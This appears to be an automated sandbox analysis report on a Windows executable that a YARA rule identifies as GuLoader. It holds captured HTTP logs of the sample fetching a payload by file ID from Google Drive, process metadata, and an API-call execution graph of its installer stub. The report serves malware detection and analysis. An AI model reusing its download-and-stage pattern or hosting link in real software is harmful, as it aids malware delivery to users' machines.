                                                      2024-12-05 11:56:01 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 05 Dec 2024 11:56:00 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-ZdtW3U7aZh3f0myGQCMbZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.450005142.250.181.14432000C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-05 11:56:02 UTC459OUTGET /download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
                                                      2024-12-05 11:56:03 UTC1847INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 05 Dec 2024 11:56:03 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mLLyegf47uyLjPHfC8NzZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      X-GUploader-UploadID: AFiumC6b-ZjwgLlIfEP8qns_41c-wVXUKC41Nra-L9Z5HENXqgG-XsEfkNH7RHDYTgp9isRdsHw
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2024-12-05 11:56:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 2d 4b 67 36 6e 6c 67 56 68 51 70 64 6e 58 68 62 71 4f 33 57 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="r-Kg6nlgVhQpdnXhbqO3Wg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.450006172.217.19.1744432000C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-05 11:56:05 UTC417OUTGET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
                                                      2024-12-05 11:56:06 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 05 Dec 2024 11:56:06 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-eFxN0jo7IoHU5jI3UteZfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:06:51:59
                                                      Start date:05/12/2024
                                                      Path:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\dIPYIbWXs1.exe"
                                                      Imagebase:0x400000
                                                      File size:886'680 bytes
                                                      MD5 hash:DA70482B3BD657FF83625FBCF998EC60
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3912510121.000000000343F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:06:55:43
                                                      Start date:05/12/2024
                                                      Path:C:\Users\user\Desktop\dIPYIbWXs1.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\dIPYIbWXs1.exe"
                                                      Imagebase:0x400000
                                                      File size:886'680 bytes
                                                      MD5 hash:DA70482B3BD657FF83625FBCF998EC60
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.4146024960.000000000222F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:17.1%
                                                        Dynamic/Decrypted Code Coverage:13.5%
                                                        Signature Coverage:16.2%
                                                        Total number of Nodes:1533
                                                        Total number of Limit Nodes:46
                                                        execution_graph 5515 401d44 5516 402bac 17 API calls 5515->5516 5517 401d52 SetWindowLongA 5516->5517 5518 402a5a 5517->5518 4108 401ec5 4116 402bac 4108->4116 4110 401ecb 4111 402bac 17 API calls 4110->4111 4112 401ed7 4111->4112 4113 401ee3 ShowWindow 4112->4113 4114 401eee EnableWindow 4112->4114 4115 402a5a 4113->4115 4114->4115 4119 40618a 4116->4119 4118 402bc1 4118->4110 4127 406197 4119->4127 4120 4063b9 4121 4063ce 4120->4121 4152 4060f7 lstrcpynA 4120->4152 4121->4118 4123 406393 lstrlenA 4123->4127 4125 40618a 10 API calls 4125->4123 4127->4120 4127->4123 4127->4125 4129 4062af GetSystemDirectoryA 4127->4129 4130 4062c2 GetWindowsDirectoryA 4127->4130 4132 40618a 10 API calls 4127->4132 4133 40633c lstrcatA 4127->4133 4134 4062f6 SHGetSpecialFolderLocation 4127->4134 4136 405fde 4127->4136 4141 4063d2 4127->4141 4150 406055 wsprintfA 4127->4150 4151 4060f7 lstrcpynA 4127->4151 4129->4127 4130->4127 4132->4127 4133->4127 4134->4127 4135 40630e SHGetPathFromIDListA CoTaskMemFree 4134->4135 4135->4127 4153 405f7d 4136->4153 4139 406012 RegQueryValueExA RegCloseKey 4140 406041 4139->4140 4140->4127 4148 4063de 4141->4148 4142 40644a CharPrevA 4146 406446 4142->4146 4143 40643b CharNextA 4143->4146 4143->4148 4144 406465 4144->4127 4146->4142 4146->4144 4147 406429 CharNextA 4147->4148 4148->4143 4148->4146 4148->4147 4149 406436 CharNextA 4148->4149 4157 405aba 4148->4157 4149->4143 4150->4127 4151->4127 4152->4121 4154 405f8c 4153->4154 4155 405f90 4154->4155 4156 405f95 RegOpenKeyExA 4154->4156 4155->4139 4155->4140 4156->4155 4158 405ac0 4157->4158 4159 405ad3 4158->4159 4160 405ac6 CharNextA 4158->4160 4159->4148 4160->4158 4161 401746 4167 402bce 4161->4167 4165 401754 4166 405cbf 2 API calls 4165->4166 4166->4165 4168 402bda 4167->4168 4169 40618a 17 API calls 4168->4169 4170 402bfb 4169->4170 4171 40174d 4170->4171 4172 4063d2 5 API calls 4170->4172 4173 405cbf 4171->4173 4172->4171 4174 405cca GetTickCount GetTempFileNameA 4173->4174 4175 405cfb 4174->4175 4176 405cf7 4174->4176 4175->4165 4176->4174 4176->4175 5654 4045c6 5655 4045d6 5654->5655 5656 4045fc 5654->5656 5657 40417b 18 API calls 5655->5657 5658 4041e2 8 API calls 5656->5658 5659 4045e3 SetDlgItemTextA 5657->5659 5660 404608 5658->5660 5659->5656 5519 401947 5520 402bce 17 API calls 5519->5520 5521 40194e lstrlenA 5520->5521 5522 402620 5521->5522 4177 403348 SetErrorMode GetVersion 4178 403389 4177->4178 4179 40338f 4177->4179 4180 406500 5 API calls 4178->4180 4267 406492 GetSystemDirectoryA 4179->4267 4180->4179 4182 4033a5 lstrlenA 4182->4179 4183 4033b4 4182->4183 4270 406500 GetModuleHandleA 4183->4270 4186 406500 5 API calls 4187 4033c2 4186->4187 4188 406500 5 API calls 4187->4188 4189 4033ce #17 OleInitialize SHGetFileInfoA 4188->4189 4276 4060f7 lstrcpynA 4189->4276 4192 40341a GetCommandLineA 4277 4060f7 lstrcpynA 4192->4277 4194 40342c 4195 405aba CharNextA 4194->4195 4196 403455 CharNextA 4195->4196 4201 403465 4196->4201 4197 40352f 4198 403542 GetTempPathA 4197->4198 4278 403317 4198->4278 4200 40355a 4202 4035b4 DeleteFileA 4200->4202 4203 40355e GetWindowsDirectoryA lstrcatA 4200->4203 4201->4197 4204 405aba CharNextA 4201->4204 4208 403531 4201->4208 4288 402ea1 GetTickCount GetModuleFileNameA 4202->4288 4205 403317 12 API calls 4203->4205 4204->4201 4207 40357a 4205->4207 4207->4202 4211 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4207->4211 4373 4060f7 lstrcpynA 4208->4373 4209 4035c8 4212 40365e 4209->4212 4215 40364e 4209->4215 4216 405aba CharNextA 4209->4216 4214 403317 12 API calls 4211->4214 4390 403830 4212->4390 4218 4035ac 4214->4218 4316 40390a 4215->4316 4220 4035e3 4216->4220 4218->4202 4218->4212 4227 403629 4220->4227 4228 40368e 4220->4228 4221 403796 4224 403818 ExitProcess 4221->4224 4225 40379e GetCurrentProcess OpenProcessToken 4221->4225 4222 403678 4397 405813 4222->4397 4230 4037e9 4225->4230 4231 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 4225->4231 4374 405b7d 4227->4374 4401 40577e 4228->4401 4234 406500 5 API calls 4230->4234 4231->4230 4237 4037f0 4234->4237 4240 403805 ExitWindowsEx 4237->4240 4241 403811 4237->4241 4238 4036a4 lstrcatA 4239 4036af lstrcatA lstrcmpiA 4238->4239 4239->4212 4243 4036cb 4239->4243 4240->4224 4240->4241 4421 40140b 4241->4421 4246 4036d0 4243->4246 4247 4036d7 4243->4247 4245 403643 4389 4060f7 lstrcpynA 4245->4389 4404 4056e4 CreateDirectoryA 4246->4404 4409 405761 CreateDirectoryA 4247->4409 4251 4036dc SetCurrentDirectoryA 4253 4036f6 4251->4253 4254 4036eb 4251->4254 4413 4060f7 lstrcpynA 4253->4413 4412 4060f7 lstrcpynA 4254->4412 4257 40618a 17 API calls 4258 403735 DeleteFileA 4257->4258 4259 403742 CopyFileA 4258->4259 4264 403704 4258->4264 4259->4264 4260 40378a 4261 405ed6 36 API calls 4260->4261 4261->4212 4263 40618a 17 API calls 4263->4264 4264->4257 4264->4260 4264->4263 4266 403776 CloseHandle 4264->4266 4414 405ed6 MoveFileExA 4264->4414 4418 405796 CreateProcessA 4264->4418 4266->4264 4269 4064b4 wsprintfA LoadLibraryExA 4267->4269 4269->4182 4271 406526 GetProcAddress 4270->4271 4272 40651c 4270->4272 4273 4033bb 4271->4273 4274 406492 3 API calls 4272->4274 4273->4186 4275 406522 4274->4275 4275->4271 4275->4273 4276->4192 4277->4194 4279 4063d2 5 API calls 4278->4279 4281 403323 4279->4281 4280 40332d 4280->4200 4281->4280 4424 405a8f lstrlenA CharPrevA 4281->4424 4284 405761 2 API calls 4285 40333b 4284->4285 4286 405cbf 2 API calls 4285->4286 4287 403346 4286->4287 4287->4200 4427 405c90 GetFileAttributesA CreateFileA 4288->4427 4290 402ee1 4308 402ef1 4290->4308 4428 4060f7 lstrcpynA 4290->4428 4292 402f07 4429 405ad6 lstrlenA 4292->4429 4296 402f18 GetFileSize 4301 402f2f 4296->4301 4313 403012 4296->4313 4298 40301b 4300 40304b GlobalAlloc 4298->4300 4298->4308 4469 403300 SetFilePointer 4298->4469 4445 403300 SetFilePointer 4300->4445 4303 40307e 4301->4303 4301->4308 4311 402e3d 6 API calls 4301->4311 4301->4313 4466 4032ea 4301->4466 4305 402e3d 6 API calls 4303->4305 4305->4308 4306 403034 4309 4032ea ReadFile 4306->4309 4307 403066 4446 4030d8 4307->4446 4308->4209 4312 40303f 4309->4312 4311->4301 4312->4300 4312->4308 4434 402e3d 4313->4434 4314 403072 4314->4308 4314->4314 4315 4030af SetFilePointer 4314->4315 4315->4308 4317 406500 5 API calls 4316->4317 4318 40391e 4317->4318 4319 403924 4318->4319 4320 403936 4318->4320 4498 406055 wsprintfA 4319->4498 4321 405fde 3 API calls 4320->4321 4322 403961 4321->4322 4324 40397f lstrcatA 4322->4324 4326 405fde 3 API calls 4322->4326 4325 403934 4324->4325 4490 403bcf 4325->4490 4326->4324 4329 405b7d 18 API calls 4330 4039b1 4329->4330 4331 403a3a 4330->4331 4333 405fde 3 API calls 4330->4333 4332 405b7d 18 API calls 4331->4332 4334 403a40 4332->4334 4335 4039dd 4333->4335 4336 403a50 LoadImageA 4334->4336 4337 40618a 17 API calls 4334->4337 4335->4331 4340 4039f9 lstrlenA 4335->4340 4343 405aba CharNextA 4335->4343 4338 403af6 4336->4338 4339 403a77 RegisterClassA 4336->4339 4337->4336 4342 40140b 2 API calls 4338->4342 4341 403aad SystemParametersInfoA CreateWindowExA 4339->4341 4371 403b00 4339->4371 4344 403a07 lstrcmpiA 4340->4344 4345 403a2d 4340->4345 4341->4338 4346 403afc 4342->4346 4347 4039f7 4343->4347 4344->4345 4348 403a17 GetFileAttributesA 4344->4348 4349 405a8f 3 API calls 4345->4349 4351 403bcf 18 API calls 4346->4351 4346->4371 4347->4340 4350 403a23 4348->4350 4352 403a33 4349->4352 4350->4345 4354 405ad6 2 API calls 4350->4354 4355 403b0d 4351->4355 4499 4060f7 lstrcpynA 4352->4499 4354->4345 4356 403b19 ShowWindow 4355->4356 4357 403b9c 4355->4357 4358 406492 3 API calls 4356->4358 4500 4052f0 OleInitialize 4357->4500 4360 403b31 4358->4360 4362 403b3f GetClassInfoA 4360->4362 4365 406492 3 API calls 4360->4365 4361 403ba2 4363 403ba6 4361->4363 4364 403bbe 4361->4364 4367 403b53 GetClassInfoA RegisterClassA 4362->4367 4368 403b69 DialogBoxParamA 4362->4368 4369 40140b 2 API calls 4363->4369 4363->4371 4366 40140b 2 API calls 4364->4366 4365->4362 4366->4371 4367->4368 4370 40140b 2 API calls 4368->4370 4369->4371 4372 403b91 4370->4372 4371->4212 4372->4371 4373->4198 4518 4060f7 lstrcpynA 4374->4518 4376 405b8e 4519 405b28 CharNextA CharNextA 4376->4519 4379 403634 4379->4212 4388 4060f7 lstrcpynA 4379->4388 4380 4063d2 5 API calls 4385 405ba4 4380->4385 4381 405bcf lstrlenA 4382 405bda 4381->4382 4381->4385 4384 405a8f 3 API calls 4382->4384 4386 405bdf GetFileAttributesA 4384->4386 4385->4379 4385->4381 4387 405ad6 2 API calls 4385->4387 4525 40646b FindFirstFileA 4385->4525 4386->4379 4387->4381 4388->4245 4389->4215 4391 403848 4390->4391 4392 40383a CloseHandle 4390->4392 4528 403875 4391->4528 4392->4391 4398 405828 4397->4398 4399 403686 ExitProcess 4398->4399 4400 40583c MessageBoxIndirectA 4398->4400 4400->4399 4402 406500 5 API calls 4401->4402 4403 403693 lstrcatA 4402->4403 4403->4238 4403->4239 4405 405735 GetLastError 4404->4405 4406 4036d5 4404->4406 4405->4406 4407 405744 SetFileSecurityA 4405->4407 4406->4251 4407->4406 4408 40575a GetLastError 4407->4408 4408->4406 4410 405771 4409->4410 4411 405775 GetLastError 4409->4411 4410->4251 4411->4410 4412->4253 4413->4264 4415 405ef7 4414->4415 4416 405eea 4414->4416 4415->4264 4585 405d66 4416->4585 4419 4057d5 4418->4419 4420 4057c9 CloseHandle 4418->4420 4419->4264 4420->4419 4422 401389 2 API calls 4421->4422 4423 401420 4422->4423 4423->4224 4425 403335 4424->4425 4426 405aa9 lstrcatA 4424->4426 4425->4284 4426->4425 4427->4290 4428->4292 4430 405ae3 4429->4430 4431 402f0d 4430->4431 4432 405ae8 CharPrevA 4430->4432 4433 4060f7 lstrcpynA 4431->4433 4432->4430 4432->4431 4433->4296 4435 402e46 4434->4435 4436 402e5e 4434->4436 4437 402e56 4435->4437 4438 402e4f DestroyWindow 4435->4438 4439 402e66 4436->4439 4440 402e6e GetTickCount 4436->4440 4437->4298 4438->4437 4470 40653c 4439->4470 4441 402e7c CreateDialogParamA ShowWindow 4440->4441 4442 402e9f 4440->4442 4441->4442 4442->4298 4445->4307 4447 4030ee 4446->4447 4448 40311c 4447->4448 4476 403300 SetFilePointer 4447->4476 4450 4032ea ReadFile 4448->4450 4451 403127 4450->4451 4452 403283 4451->4452 4453 403139 GetTickCount 4451->4453 4457 40326d 4451->4457 4454 4032c5 4452->4454 4459 403287 4452->4459 4453->4457 4462 403188 4453->4462 4455 4032ea ReadFile 4454->4455 4455->4457 4456 4032ea ReadFile 4456->4462 4457->4314 4458 4032ea ReadFile 4458->4459 4459->4457 4459->4458 4460 405d37 WriteFile 4459->4460 4460->4459 4461 4031de GetTickCount 4461->4462 4462->4456 4462->4457 4462->4461 4463 403203 MulDiv wsprintfA 4462->4463 4474 405d37 WriteFile 4462->4474 4477 40521e 4463->4477 4488 405d08 ReadFile 4466->4488 4469->4306 4471 406559 PeekMessageA 4470->4471 4472 402e6c 4471->4472 4473 40654f DispatchMessageA 4471->4473 4472->4298 4473->4471 4475 405d55 4474->4475 4475->4462 4476->4448 4479 405239 4477->4479 4487 4052dc 4477->4487 4478 405256 lstrlenA 4481 405264 lstrlenA 4478->4481 4482 40527f 4478->4482 4479->4478 4480 40618a 17 API calls 4479->4480 4480->4478 4483 405276 lstrcatA 4481->4483 4481->4487 4484 405292 4482->4484 4485 405285 SetWindowTextA 4482->4485 4483->4482 4486 405298 SendMessageA SendMessageA SendMessageA 4484->4486 4484->4487 4485->4484 4486->4487 4487->4462 4489 4032fd 4488->4489 4489->4301 4491 403be3 4490->4491 4507 406055 wsprintfA 4491->4507 4493 403c54 4508 403c88 4493->4508 4495 40398f 4495->4329 4496 403c59 4496->4495 4497 40618a 17 API calls 4496->4497 4497->4496 4498->4325 4499->4331 4511 4041c7 4500->4511 4502 40533a 4503 4041c7 SendMessageA 4502->4503 4504 40534c OleUninitialize 4503->4504 4504->4361 4505 405313 4505->4502 4514 401389 4505->4514 4507->4493 4509 40618a 17 API calls 4508->4509 4510 403c96 SetWindowTextA 4509->4510 4510->4496 4512 4041d0 SendMessageA 4511->4512 4513 4041df 4511->4513 4512->4513 4513->4505 4516 401390 4514->4516 4515 4013fe 4515->4505 4516->4515 4517 4013cb MulDiv SendMessageA 4516->4517 4517->4516 4518->4376 4520 405b43 4519->4520 4523 405b53 4519->4523 4522 405b4e CharNextA 4520->4522 4520->4523 4521 405b73 4521->4379 4521->4380 4522->4521 4523->4521 4524 405aba CharNextA 4523->4524 4524->4523 4526 406481 FindClose 4525->4526 4527 40648c 4525->4527 4526->4527 4527->4385 4529 403883 4528->4529 4530 40384d 4529->4530 4531 403888 FreeLibrary GlobalFree 4529->4531 4532 4058bf 4530->4532 4531->4530 4531->4531 4533 405b7d 18 API calls 4532->4533 4534 4058df 4533->4534 4535 4058e7 DeleteFileA 4534->4535 4536 4058fe 4534->4536 4537 403667 OleUninitialize 4535->4537 4538 405a2c 4536->4538 4572 4060f7 lstrcpynA 4536->4572 4537->4221 4537->4222 4538->4537 4545 40646b 2 API calls 4538->4545 4540 405924 4541 405937 4540->4541 4542 40592a lstrcatA 4540->4542 4544 405ad6 2 API calls 4541->4544 4543 40593d 4542->4543 4546 40594b lstrcatA 4543->4546 4548 405956 lstrlenA FindFirstFileA 4543->4548 4544->4543 4547 405a50 4545->4547 4546->4548 4547->4537 4549 405a54 4547->4549 4548->4538 4555 40597a 4548->4555 4550 405a8f 3 API calls 4549->4550 4552 405a5a 4550->4552 4551 405aba CharNextA 4551->4555 4553 405877 5 API calls 4552->4553 4554 405a66 4553->4554 4556 405a80 4554->4556 4557 405a6a 4554->4557 4555->4551 4560 405a0b FindNextFileA 4555->4560 4570 4059cc 4555->4570 4573 4060f7 lstrcpynA 4555->4573 4559 40521e 24 API calls 4556->4559 4557->4537 4561 40521e 24 API calls 4557->4561 4559->4537 4560->4555 4562 405a23 FindClose 4560->4562 4563 405a77 4561->4563 4562->4538 4564 405ed6 36 API calls 4563->4564 4567 405a7e 4564->4567 4566 4058bf 60 API calls 4566->4570 4567->4537 4568 40521e 24 API calls 4568->4560 4569 40521e 24 API calls 4569->4570 4570->4560 4570->4566 4570->4568 4570->4569 4571 405ed6 36 API calls 4570->4571 4574 405877 4570->4574 4571->4570 4572->4540 4573->4555 4582 405c6b GetFileAttributesA 4574->4582 4577 405892 RemoveDirectoryA 4580 4058a0 4577->4580 4578 40589a DeleteFileA 4578->4580 4579 4058a4 4579->4570 4580->4579 4581 4058b0 SetFileAttributesA 4580->4581 4581->4579 4583 405883 4582->4583 4584 405c7d SetFileAttributesA 4582->4584 4583->4577 4583->4578 4583->4579 4584->4583 4586 405db2 GetShortPathNameA 4585->4586 4587 405d8c 4585->4587 4589 405ed1 4586->4589 4590 405dc7 4586->4590 4612 405c90 GetFileAttributesA CreateFileA 4587->4612 4589->4415 4590->4589 4592 405dcf wsprintfA 4590->4592 4591 405d96 CloseHandle GetShortPathNameA 4591->4589 4593 405daa 4591->4593 4594 40618a 17 API calls 4592->4594 4593->4586 4593->4589 4595 405df7 4594->4595 4613 405c90 GetFileAttributesA CreateFileA 4595->4613 4597 405e04 4597->4589 4598 405e13 GetFileSize GlobalAlloc 4597->4598 4599 405e35 4598->4599 4600 405eca CloseHandle 4598->4600 4601 405d08 ReadFile 4599->4601 4600->4589 4602 405e3d 4601->4602 4602->4600 4614 405bf5 lstrlenA 4602->4614 4605 405e54 lstrcpyA 4608 405e76 4605->4608 4606 405e68 4607 405bf5 4 API calls 4606->4607 4607->4608 4609 405ead SetFilePointer 4608->4609 4610 405d37 WriteFile 4609->4610 4611 405ec3 GlobalFree 4610->4611 4611->4600 4612->4591 4613->4597 4615 405c36 lstrlenA 4614->4615 4616 405c0f lstrcmpiA 4615->4616 4617 405c3e 4615->4617 4616->4617 4618 405c2d CharNextA 4616->4618 4617->4605 4617->4606 4618->4615 5301 4038c8 5302 4038d3 5301->5302 5303 4038da GlobalAlloc 5302->5303 5304 4038d7 5302->5304 5303->5304 5661 401fcb 5662 402bce 17 API calls 5661->5662 5663 401fd2 5662->5663 5664 40646b 2 API calls 5663->5664 5665 401fd8 5664->5665 5667 401fea 5665->5667 5668 406055 wsprintfA 5665->5668 5668->5667 5103 6e4b225a 5104 6e4b22c4 5103->5104 5105 6e4b22ee 5104->5105 5106 6e4b22cf GlobalAlloc 5104->5106 5106->5104 5107 6e4b1058 5110 6e4b1074 5107->5110 5108 6e4b10dc 5109 6e4b1091 5112 6e4b14bb GlobalFree 5109->5112 5110->5108 5110->5109 5120 6e4b14bb 5110->5120 5113 6e4b10a1 5112->5113 5114 6e4b10a8 GlobalSize 5113->5114 5115 6e4b10b1 5113->5115 5114->5115 5116 6e4b10c6 5115->5116 5117 6e4b10b5 GlobalAlloc 5115->5117 5119 6e4b10d1 GlobalFree 5116->5119 5118 6e4b14e2 3 API calls 5117->5118 5118->5116 5119->5108 5122 6e4b14c1 